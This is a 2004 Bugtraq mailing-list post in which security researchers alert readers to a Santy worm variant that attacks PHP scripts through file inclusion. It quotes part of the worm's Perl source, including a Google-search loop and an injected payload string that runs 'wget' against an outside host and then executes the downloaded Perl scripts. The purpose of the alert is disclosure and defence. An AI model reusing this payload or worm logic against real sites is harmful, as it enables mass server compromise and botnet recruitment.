Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )
From: K-OTiK Security <Special-Alerts () k-otik com>
Date: 26 Dec 2004 02:37:52 -0000

In-Reply-To: <Pine.LNX.4.58.0412251805110.19888 () loki ct heise de>

The kids are exploiting the php file inclusion (programming flaw), well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in "using search engines").

http://www.k-otik.com/exploits/20041225.SantyC.php
http://www.k-otik.com/exploits/20041225.SantyB.php

Regards
K-OTik Security Research & Monitoring Team 24/7
http://www.k-otik.com 


From: Juergen Schmidt <ju () heisec de>

Hello,

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

Often enough this leads to download and execution of code.
On success the worm connects to an IRC server, where already more than 700
zombies are waiting for commands.

The relevant code:
---------
$procura = 'inurl:*.php?*=' . $numr;

for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
...

$lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget
www.visualcod
ers.net/php.txt;wget www.visualcoders.net/ownz.txt;wget
www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl
ownz.txt;perl php.txt';
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
$t=1;
while ($t < $y)
  {
   if ($ja[$t] =~/=/)
     {
      $num = rindex $ja[$t], '=';
      $num += 1;
      $ja[$t] = substr($ja[$t],0,$num);
           open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
caxe1.txt";
           print jaera "$ja[$t]$lista1\n";
           close(jaera);
       $num = index $ja[$t], '=';
       $num += 1;
       $ja[$t] = substr($ja[$t],0,$num);
       $num1 = rindex $ja[$t], '.';
       $subproc = substr($ja[$t],$num1,$num);

           open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar
caxe1.txt";
           print jaera "$ja[$t]$lista1\n";
           close(jaera);
     }
    $t++;
    }


bye, ju

-- 
Juergen Schmidt       Chefredakteur  heise Security     www.heisec.de
Heise Zeitschriften Verlag,    Helstorferstr. 7,       D-30625 Hannover
Tel. +49 511 5352 300      FAX +49 511 5352 417       EMail ju () heisec de
GPG-Key: 0x38EA4970,  5D7B 476D 84D5 94FF E7C5  67BE F895 0A18 38EA 4970



  By Date           By Thread  

Current thread:
  • Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? ) K-OTiK Security (Dec 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault